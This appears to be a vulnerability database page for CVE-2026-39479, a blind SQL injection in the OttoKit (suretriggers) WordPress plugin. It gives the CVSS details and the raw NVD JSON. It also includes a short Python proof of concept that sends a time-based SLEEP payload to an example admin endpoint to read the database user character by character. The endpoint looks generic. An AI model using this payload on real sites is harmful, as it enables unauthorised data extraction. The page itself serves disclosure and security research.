Security Vulnerability Report
中文
CVE-2026-39479 CVSS 7.6 HIGH

CVE-2026-39479

Published: 2026-04-08 09:16:23
Last Modified: 2026-04-24 18:08:35

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Brainstorm Force OttoKit suretriggers allows Blind SQL Injection.This issue affects OttoKit: from n/a through <= 1.1.20.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

OttoKit <= 1.1.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # Target URL (Example) target_url = "http://example.com/wp-admin/admin.php?page=suretriggers_endpoint" # Attacker's Cookies (High privilege session required) cookies = { "wordpress_logged_in_xxx": "attacker_session_cookie" } # Payload for Time-Based Blind SQL Injection # Checking if the first character of the database user is 'a' (ASCII 97) payload = { "id": "1 AND (SELECT SUBSTRING(user(),1,1)) = CHAR(97) AND SLEEP(5)-- " } start_time = time.time() response = requests.get(target_url, params=payload, cookies=cookies) end_time = time.time() if end_time - start_time >= 5: print("[+] Vulnerability confirmed! Condition was true (Response delayed).") else: print("[-] Condition false or not vulnerable.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39479", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:22.670", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Brainstorm Force OttoKit suretriggers allows Blind SQL Injection.This issue affects OttoKit: from n/a through <= 1.1.20."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/suretriggers/vulnerability/wordpress-ottokit-plugin-1-1-20-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}